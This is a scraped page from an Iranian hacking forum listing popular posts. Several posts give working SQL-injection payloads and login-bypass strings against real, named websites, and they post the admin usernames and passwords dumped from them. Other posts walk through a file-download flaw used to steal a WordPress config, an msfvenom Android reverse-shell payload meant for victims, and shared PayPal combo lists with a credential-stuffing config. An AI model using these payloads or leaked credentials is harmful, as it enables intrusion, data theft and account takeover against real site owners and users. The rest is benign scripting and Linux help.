discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. proxy

    proxy

    مدير بخش


    • امتیاز

      210

    • تعداد ارسال ها

      685


  2. R3DN4X314

    R3DN4X314

    مدير بخش


    • امتیاز

      84

    • تعداد ارسال ها

      211


  3. MR.MSA

    MR.MSA

    عضو تیم دیفیس


    • امتیاز

      46

    • تعداد ارسال ها

      269


  4. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      29

    • تعداد ارسال ها

      2,564



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در شنبه, 1 آذر 1399 در همه بخش ها

  1. 6 امتیاز
    MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  2. 4 امتیاز
    17) https://peaceassociates.com.pk/university.php?id=-23%27+union+select+1,2,3,4,5,group_concat(userName,0x3a,password,%27%3CBr%3E%27),7,8,9+from+p_admin--+ user : peace pass : 7a447473a85a846f0f56a792912d5c7f || cracked : pak@123
  3. 2 امتیاز
    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول http://musculoskeletalsociety.in/page.php?id=5 شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید http://musculoskeletalsociety.in/page.php?id=5 order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند 😁 پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش http://musculoskeletalsociety.in/page.php?id=-5 order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است http://musculoskeletalsociety.in/page.php?id=-5 order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور http://musculoskeletalsociety.in/page.php?id=-5 union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim http://musculoskeletalsociety.in/page.php?id=-5%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> http://www.belbana.com شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"http://www.belbana.com" inurl:"id=" http://www.belbana.com/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم http://www.belbana.com/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم http://www.belbana.com/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق http://www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
  4. 2 امتیاز
    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک یک رمزنگاری و رمزگشایی متن رو با برنامه Autoit نوشتم میتونید استفاده کنید سورس کدها و فیلم آموزشی نحوه ی استفاده را قرار میدم ;Code By rvlocker ;;;;;;;;guardiran.org #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Icon=..\Downloads\defend-encryption-cyan-1_0.ico #AutoIt3Wrapper_UseX64=n #AutoIt3Wrapper_Res_Comment=Code by rvlocker --> This is a program for text encryption #AutoIt3Wrapper_Res_Description=Text encryption #AutoIt3Wrapper_Run_Au3Stripper=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <Crypt.au3> #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <StaticConstants.au3> #include <TabConstants.au3> #include <WindowsConstants.au3> #Region ### START Koda GUI section ### Form= Global $Form1 = GUICreate("EnCrypt Text ! code by---> rvlocker", 570, 256, 302, 173) GUISetBkColor(0x008000) Global $Tab1 = GUICtrlCreateTab(8, 0, 553, 249) Global $enCryptText = GUICtrlCreateTabItem("EnCrypt") Global $Edit1 = GUICtrlCreateEdit("", 48, 32, 265, 73) GUICtrlSetData(-1, "") Global $Button1 = GUICtrlCreateButton("SetPassword", 328, 48, 121, 33) GUICtrlSetFont(-1, 8, 400, 0, "Broadway") GUICtrlSetColor(-1, 0x800000) GUICtrlSetBkColor(-1, 0x00FFFF) Global $Edit2 = GUICtrlCreateEdit("", 48, 136, 265, 73) GUICtrlSetData(-1, "") Global $Button2 = GUICtrlCreateButton("Encrypt", 328, 160, 121, 33) GUICtrlSetFont(-1, 8, 400, 0, "Elephant") GUICtrlSetColor(-1, 0x800080) GUICtrlSetBkColor(-1, 0x99B4D1) Global $deCryptText = GUICtrlCreateTabItem("DeCrypt") Global $Edit3 = GUICtrlCreateEdit("", 48, 40, 265, 73) GUICtrlSetData(-1, "") Global $Button3 = GUICtrlCreateButton("YourPassword", 328, 56, 121, 33) GUICtrlSetFont(-1, 8, 800, 0, "Sitka Text") GUICtrlSetColor(-1, 0x0000FF) GUICtrlSetBkColor(-1, 0x800080) Global $Edit4 = GUICtrlCreateEdit("", 48, 136, 265, 73) GUICtrlSetData(-1, "") Global $Button4 = GUICtrlCreateButton("DeCrypt", 328, 152, 121, 33) GUICtrlSetFont(-1, 8, 800, 0, "Ravie") GUICtrlSetColor(-1, 0x008080) Global $Help = GUICtrlCreateTabItem("Help") Global $Label1 = GUICtrlCreateLabel("Hello, to use the program", 144, 32, 219, 22) GUICtrlSetFont(-1, 11, 400, 2, "Showcard Gothic") GUICtrlSetColor(-1, 0xFF0000) GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label2 = GUICtrlCreateLabel("first enter your password ", 128, 56, 248, 24) GUICtrlSetFont(-1, 12, 400, 2, "Showcard Gothic") GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label3 = GUICtrlCreateLabel("guardiran.org", 136, 160, 253, 30) GUICtrlSetFont(-1, 16, 400, 0, "Wide Latin") GUICtrlSetColor(-1, 0x00FF00) GUICtrlSetBkColor(-1, 0xFFFFFF) Global $Label4 = GUICtrlCreateLabel("and then your text for encryption", 112, 96, 289, 22) GUICtrlSetFont(-1, 11, 400, 0, "Showcard Gothic") GUICtrlSetColor(-1, 0xFF00FF) GUICtrlSetBkColor(-1, 0xFFFFFF) GUICtrlCreateTabItem("") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $Button1 Global $PasswordFromUser1 = GUICtrlRead($Edit1) Case $Button2 Global $TextFromUser1 = GUICtrlRead($Edit2) $encData = _Crypt_EncryptData($TextFromUser1,$PasswordFromUser1,$CALG_AES_256) MsgBox(64,"",$encData) $saveLocation = FileSaveDialog("Encrypt File ",@ScriptDir,"Text Files (*.txt)",16) FileWrite($saveLocation,$encData) Case $Button3 Global $PasswordFromUser2 = GUICtrlRead($Edit3) Case $Button4 $deCryptData = _Crypt_DecryptData($encData,$PasswordFromUser2,$CALG_AES_256) MsgBox(64,"",BinaryToString($encData)) $saveLocation2 = FileSaveDialog("Decrypt File ",@ScriptDir,"Text Files (*.txt)",16) FileWrite($saveLocation2,$deCryptData) EndSwitch WEnd در تاپیک های بعدی برنامه های بیشتری قرار خواهم داد rvlocker.mp4 دانلود فایل ---->> دانلود از github برای آموزش های بیشتر به دیسکورد گاردایران مراجعه فرمایید با تشکر
  5. 2 امتیاز
    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربر محترم انجمن گاردایران ابتدا شما باید نسخه لینوکس رو نصب کنید Parrot OS linux or Kali linux سپس باید payload خودتونو بسازید ---> با وارد شدن به ترمینال دستورات زیر را وارد میکنید msfvenom android/meterpreter/reverse_tcp LHOST=link_add LPORT=link_port > app.apk در قسمت » LHOST و LPORT شما باید آیپی local و پورتی که قصد وارد کردن برای payload رو دارین وارد کنید برای فهمیدن LHOST یک ترمینال دیکر باز کنید و دستور sudo ifconfig را وارد کنید payload ----(شما بعد از وارد کردن آماده است ولی این payload فقط برای داخل شبکه کار میکند پس پیشنهاد بنده این است که شما از سرور مجازی کالی لینوکس استفاده کنید در غیر این صورت باید پورت فوروارد کنید ) بعد از مراحل بالا شما باید دوباره وارد ترمینال شوید و ستور msfconsole را وارد کنید بعد از آن دستورات زیر را وارد کنید برای دسترسی کامل ---->> use multi/handler set payload android/meterpreter/reverse_tcp سپس باید پورت هارو تنظیم کنیم set lhost local ip در قسمت local ip که نوشتم شما باید آیپیی قرار بدید مربوط با آیپی سیستمتون هستش با همان دستوری که خدمتتون عرض کردم sudo ifconfig و در قسمت بعدی پورتی که به دلخواه مثلا 4444 قرار دادید در payload در اینجا قرار بدید set lport 4444 -->>>مثاللل و در آخر exploit exploit payload شما آماده است به تارگت بدین و دسترسی کامل داشته باشید امیدوارم مفید واقع شده باشه برای اموزش های بیشتر به دیسکورد گاردایران مراجعه کنید با تشکر
  6. 2 امتیاز
    تارگت تمرینی برای باگ sql injection دوستان لطف کنند تارگت رو دستکاری نکنند تا دوستان دیگر هم بتوانند استفاده کنند . 🙏 لینک تضمین : 1)http://alfacc.com/safety_banner.php?types=088+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5,6,7,8+from+system_user-- آدرس : alfacc.com یوزر : MR.MSA پسورد : 3<<394f>e4d4%%8374jdexh صفحه ادمین : alfacc.com/admin 💙فراموش نشه 😆
  7. 2 امتیاز
    سلام رفقا ، یه سایت هست به اسم رادیو اسرائیل ، برای پن تست وقتی آدرسشو پینگ میکنم این آی پی میاد : 162.241.13.144 ، وقتی همین آی پی رو جستوجو میکنم یه سایت دیگه میاد بالا با این آدرس radiopayam.co درصورتی که آدرس اصلی سایت radis.org . با ابزار های مختلفی تست کردم ، جستوجو هم که کردم علتشو پیدا نکردم . ممنون میشم راهنمایی کنید :)
  8. 2 امتیاز
    این سایتها آی پی رو بعضی وقتا چرت میزنن پینگ بگیرین
  9. 2 امتیاز
    سلام مجدد ، درسته اما من با سایت هم چک کردم آی پی ها یکی بود ! اسکرین شات رو میزارم ، خودتون ببینید .
  10. 2 امتیاز
    سلام دوست عزیز بنده تست کردم ای پی ها متفاوت بودن ! http://radiopayam.co/ ----> 162.241.13.144 radiopayam.co -----> 10.10.34.35 اصلا از نظر فنی چنین چیزی امکان پذیر نیست
  11. 2 امتیاز
    سلام.بابت تاخیر عذر میخوام شرایط پاسخگویی نداشتم. ببینید برای دالندو کانفیگ از عباراتی مانند download.php | config.php | configuaration.php | down.php | Dl.php استفاده میشه.(البته در بعضی CMS های خاص مثل ورد پرس نام فایل کانفیگ مشخصی داره.مثلا وردپرس wp-config.php هست) از این عبارات استفاده کنید.تارگتی که قرار دادین هیچکدوم از اینا جواب نداد وباید بیشتر روش کار بشه. خوب تارگت تمرینی: http://roadstershop.com/download.php?download_file= خوب ما فرض بر این میگیریم که نمیدونیم تارگت وردپرس هست. میایم و فایل index.php رو دانلود میکنیم.در ین فایل به ما مسیر هدر های سایت رو میده که این هست wp-blog-header.php بعد از اینکه به دایرکتوری موردنظر رفتیم این آدرس رو به ما میده wp-load.php.این فایل حاوی نام فایل کانفیگ سایت هست که همون wp-config.php هست. خوب بعد از اینکه فایل wp-load.php رو دانلود و اجرا کردیم نام فایل کافیگ هست و اون رو اجرا میکنیم م کانفیگ رو دانلود میکنیم. مسیر فایل کانفیگ: http://roadstershop.com/download.php?download_file=wp-config.php یک دورک مناسب برای این باگ: inurl:/download.php?download_file= موفق باشید
  12. 1 امتیاز
    sign4l

    Dir Hunter

    سلام وقتتون بخیر چند وقت پیش یکی از اعضای انجمن ازم خواست صفحه ادمین یه سایت و پیدا کنم داشتم همینطوری تو چند تا اسکریپت گشت میزدم که هیچ کدوم کارم رو راه ننداخت گفتم چرا خودم یه ابزار نسازم که هم کار باهاش راحت باشه هم کارمو راه بندازه؟ حالا تو این تاپیک میخوام ابزارمو معرفی کنم که یه ابزار گرافیکی و کار باهاش سادس ویژگی این ابزار اینه که میتونید خودتون دستی لیست پیلود هاش رو افزایش بدین لینک دانلود
  13. 1 امتیاز
    اگه برای بخش های یک شرکت از کلاس های مختلف برای ip دهی استفاده بشه مشکلی نداره؟
  14. 1 امتیاز
    با عرض سلام خدمت مدیر عزیز ببین برادر اینکه شما می گویی پست ناجور است من به عنوان یک کاربر تازه وارد نه قصد دارم طرف آقایی که این پست را گزاشته بگیرم نه قصد دارم کار شما را اشتباه جلوه بدهم اولا هرکسی خودش میدونه چه پستی را نگاه کنه چه پستی را جست و جو کنه شما نمی توانی جلوی مردم را بگیری بگویی آقا نرو سمت پورن این ها به کنار تعداد بازدید های این پست از پست های دیگر بیشتر بوده است دوست عزیز بیشتر این دوستان تازه کار هستند مثل من شما الان با هرکسی که اشتباه کند اکانتش را بن می کنی؟ دست شما درد نکنه با احترام🌹
  15. 1 امتیاز
    MR.MSA

    sql injection ( انلاین )

    با سلام خدمت دوستان عزیز در این تاپیک هر کس تمایل دارد sql injection رو یاد بگیرد (به صورت انلاین ) که خودم آموزش می دهم اینجا اعلام کند . توی تلگرام آموزش می دهم . ابتدا باید این جا اعلام کنید تا برای شما پیام ارسال کنم . فقط کسانی که ثبت نام کردن می توانند در اموزش شرکت کنند و دیگر یه عضو خوب باشه تو انجمن ، فعال و گذاشتن پست و... امیدوارم لذت ببرید . 😅
  16. 1 امتیاز
    Mr.Taser

    Paypal Combo list

    Not Checked PayPal Combo.txt
  17. 1 امتیاز
    Mr.Taser

    (Paypal API Config (New

    Paypal API Config (New) Soft:OpenBullet Proxy:Need Bot:150 Paypal.anom
  18. 1 امتیاز
    R3DN4X314

    ابزار hydra ارور

    نه عزیز من اینجوری در مورد خودت فکر نکن ، هیچ کس تو هیچ زمینه علمی ای مسلط به دنیا نمیاد ، همه از صفر شروع کردن حتی بهترین ها همین که جسارت فکر کردن به هکر شدن رو داشتی کافیه تا قدمای بعدی رو برداری ، انجمن هم پشتته
  19. 1 امتیاز
    Ctrl + Alt + F1 فقط log out می کنه ! راه دیگه ای نداره؟
  20. 1 امتیاز
    این افزونه olled dimmer که فعال شد صفحه کلا سیاه شد و محیط گرافیکی چیزی نشون نمیده ! چطور باید وارد محیط command line گراب شد ؟ تا از اون طریق غیر فعالش کرد؟
  21. 1 امتیاز
    https://askubuntu.com/questions/591757/how-to-activate-deactivate-a-gnome-shell-extension-from-command-line
  22. 1 امتیاز
    MR.MSA

    بوت نشدن ابونتو

    با سلام به احتمال زیاد درست پارتیشن بندی نکردید . (البته اگر تازه نصب کردید ) و یا مشکل از هاردتون هست و ابونتو پارتیشن ها رو پیدا نمی کنه من برای خودمم توی ویندوز و پاروت این مشکل پیش اومد . اگه هارد مشکلی نداره دوباره ابونتو رو نصب کنید .
  23. 1 امتیاز
    با سلام در سیستم عامل کالی نام فولدر user در پوشه home رو عوض کردم و رمز و نام کاربری رو برای login با این که درست می زنم ولی صفحه سیاه میشه و دوباره صفحه login بالا میاد مشکل چیه؟
  24. 1 امتیاز
    در صورتی که تارگت ایرانی نباشه مشگلی وجود نداره با این حال این عمل چه از نظر علمی ، چه از نظر فعالیتی ارزش چندانی نداره ، به همین دلیل بعید میدونم استقبال بشه حتی کم از این گذشته همونطور که قبل تر مدیران تیم اعلام کردن ، تغیر و تحولات چشم گیری به زودی اعمال میشه ، که به اندازه کافی شما جذب و درگیرشون میشید که نیازی به اینجور پروژه ها نباشه
  25. 1 امتیاز
    بخش دوم - قسمت سیزدهم ادامه ایجاد فایل دیسکریپتر های الترناتیو : شما میتونید همونطور که در قسمت قبل خروجی الترناتیو تعریف کردید , فایل دیسکریپتر های الترناتیو برای ورودی تعریف کنید , مثال زیر رو ببینید : $ cat test15 #!/bin/bash # redirect kardane file descriptor voroodi # exec 6<&0 # exec 0< testfile # count=1 while read line do echo "Line #$count: $line" count=$[ $count + 1 ] done exec 0<&6 read -p "karetoon anjam shod ? " answer case $answer in Y|y) echo "bye";; N|n) echo "inja ghesmate akhare";; esac $ ./test15 Line #1: in khate avale Line #2: in khate dovome Line #3: in khate sevome karetoon anjam shod ? y bye همچنین شما میتونید یک فایل دیسکریپتر برای دریافت دیتا از یک فایل , و همچنین ارسال دیتا بهش ایجاد کنید در این متد شل از یک اشاره گر داخل فایل استفاده میکنه تا محل کنونی برای ادامه فعالیت مشخص باشه , مثال : $ cat test16 #!/bin/bash # teste ijade file descriptor baraye voroodi va khorooji # exec 3<> testfile read line <&3 echo "Read: $line" echo "in yek teste" >&3 $ cat testfile in khate avale in khate dovome in khate sevome $ ./test16 Read: in khate avale $ cat testfile in khate avale in yek teste in khate sevome به خط دوم داخل فایل , یا همون خروجی اسکریپتمون دقت کردید ؟ وقتی ما با دستور read خط اول فایل رو چاپ کردیم اشاره گر داخل فایل برای نشون دادن محل کنونی به شل , در محل اولین کاراکتر در خط دوم قرار گرفته , به همین دلیل وقتی خواستیم خروجی به فایل اضافه کنیم , مقدار خروجی روی خط دوم فایل نوشته و جایگزین شده وقتی قصد استفاده موازی از یک فایل رو دارید باید حتما به این نکته توجه کنید همچنین برای بستن یک فایل دیسکریپتر از دستور زیر همراه با شماره مورد نظر استفاده کنید , دستور و مثال : exec 3>&- $ cat badtest #!/bin/bash # teste bastane file descriptor ha # exec 3> test17file # echo "in yek teste" >&3 # exec 3>&- # echo "injoori kar nemikone" >&3 $ ./badtest ./badtest: 3: Bad file descriptor دیدید که به دلیل بسته بودن ارتباط دستور چاپ باعث شد ارور به وجود بیاد و خود ارور هم مبنی بر اینه که فایل دیسکریپتر استفاده شده ارجاع نشده نکته بعدی که باید در نظر داشته باشید اینه که ارجاع یک فایلی که وجود داره , باعث نوشتن روی دیتا های اون فایل میشه , مثال : $ cat test17 #!/bin/bash # exec 3> test17file echo "in yek teste" >&3 exec 3>&- # cat test17file # exec 3> test17file echo "in teste dovome" >&3 $ ./test17 in yek teste $ cat test17file in teste dovome برای لیست کردن فایل دیسکریپتر ها و محل ارجاعشون از دستور lsof استفاده میکنیم : $ /usr/sbin/lsof -a -p $$ -d 0,1,2 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME bash 3344 rednaxela 0u CHR 136,0 2 /dev/pts/0 bash 3344 rednaxela 1u CHR 136,0 2 /dev/pts/0 bash 3344 rednaxela 2u CHR 136,0 2 /dev/pts/0 در مثال بالا از اپشن p- برای مشخص کردن PID و از اپشن d- برای مشخص کردن فایل دیسکریپتر استفاده کردیم شل PID فعلی رو در متغیر محیطی $$ نگهداری میکنه , که برای مقدار دهی سریع در مثال بالا ازش استفاده کردیم , مثال استفاده در اسکریپت : $ cat test18 #!/bin/bash # teste lsof hamrah ba file descriptor ha # exec 3> test18file1 exec 6> test18file2 exec 7< testfile # /usr/sbin/lsof -a -p $$ -d0,1,2,3,6,7 $ ./test18 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME test18 3594 rednaxela 0u CHR 136,0 2 /dev/pts/0 test18 3594 rednaxela 1u CHR 136,0 2 /dev/pts/0 test18 3594 rednaxela 2u CHR 136,0 2 /dev/pts/0 18 3594 rednaxela 3w REG 253,0 0 360712 /home/rednaxela/test18file1 18 3594 rednaxela 6w REG 253,0 0 360715 /home/rednaxela/test18file2 18 3594 rednaxela 7r REG 253,0 73 360717 /home/rednaxela/testfile بعضی وقتا قصد ندارید اسکریپتتون هیچ خروجی ای داشته باشه, مثل وقتایی که قراره بکگراند اجرا بشه برای این کار شما میتونید STDERR رو ریدایرکت کنید به یک فایل مخصوص به اسم null file هر اطلاعاتی که شل به این فایل بفرسته از بین میره محل استاندارد این فایل در سیستم های لینوکس /dev/null هستش $ ls -al > /dev/null $ cat /dev/null این یک راه برای چاپ نشدن ارور هاست , مثال زیر رو ببینید : $ ls -al badfile test16 2> /dev/null -rwxr--r-- 1 rednaxela rednaxela 135 Oct 29 19:57 test16* استفاده به عنوان ورودی : $ cat testfile in khate avale in khate dovome in khate sevome $ cat /dev/null > testfile $ cat testfile $ فایل های موقت : لینوکس از دایرکتوری tmp/ برای نگهداری فایل های موقت استفاده میکنه همچنین دستور مخصوصی برای ساخت این فایل ها قرار داده mktemp و فایل های ساخته شده میتونن در دایرکتوری مخصوص نگه داری بشن ضمنا فایل های ساخته شده از umask پیشفرض تبعیت نمیکنن , این فایل ها دسترسی خوندن و نوشتن و فقط برای صاحب فایل در حالت پیشفرض قرار میدن برای ایجاد فایل از دستور مربوطه همراه با شش حرف اکس جلوی اسم فایل استفاده میکنیم که این حروف با شش کاراکتر برای اطمینان از واحد بودن اسم فایل جایگزین میشن , مثال زیر رو ببینید : $ mktemp testing.XXXXXX $ ls -al testing* -rw------- 1 rednaxela rednaxela 0 Oct 17 21:30 testing.UfIi13 شما میتونید با خیال راحت تعداد زیادی فایل با یک اسم تعریف کنید : $ mktemp testing.XXXXXX testing.1DRLuV $ mktemp testing.XXXXXX testing.lVBtkW $ mktemp testing.XXXXXX testing.PgqNKG $ ls -l testing* -rw------- 1 rednaxela rednaxela 0 Oct 17 21:57 testing.1DRLuV -rw------- 1 rednaxela rednaxela 0 Oct 17 21:57 testing.PgqNKG -rw------- 1 rednaxela rednaxela 0 Oct 17 21:30 testing.UfIi13 -rw------- 1 rednaxela rednaxela 0 Oct 17 21:57 testing.lVBtkW برای استفاده از این دستور در اسکریپت شما میتونید اسم فایل ساخته شده رو در یک متغیر برای دسترسی راحت قرار بدید , مثال زیر : $ cat test19 #!/bin/bash # ijad va estefade az yek temp file # tempfile=$(mktemp test19.XXXXXX) # exec 3>$tempfile # echo "in script dar temp file neveshte mishe : $tempfile" echo "in khate avale" >&3 echo "in khate dovome" >&3 echo "in khate akhare" >&3 exec 3>&- # echo "sakhte temp file tamoome, mohtava:" cat $tempfile rm -f $tempfile 2> /dev/null $ ./test19 in script dar temp file neveshte mishe : test19.vCHoya sakhte temp file tamoome, mohtava: in khate avale in khate dovome in khate akhare ساخت فایل موقت در دایرکتوریه مخصوصشون tmp/ برای این کار تنها کافیه اپشن t- رو به دستور اضافه کنیم وقتی با این روش فایل ساخته بشه خروجی دستور مسیر کامل فایله نه فقط اسمش : $ mktemp -t test.XXXXXX /tmp/test.xG3374 $ ls -al /tmp/test* -rw------- 1 rednaxela rednaxela 0 2019-10-29 18:41 /tmp/test.xG3374 یک مثال پویا تر : $ cat test20 #!/bin/bash # injade temp file dar /tmp # tempfile=$(mktemp -t tmp.XXXXXX) # echo "in yek file teste" > $tempfile echo "in dovomin khat az file teste" >> $tempfile echo "mahale negahdarie tmp file: $tempfile" cat $tempfile rm -f $tempfile $ ./test20 mahale negahdarie tmp file: /tmp/tmp.Ma3390 in yek file teste in dovomin khat az file teste پایان قسمت سیزدهم از بخش دوم
  26. 1 امتیاز
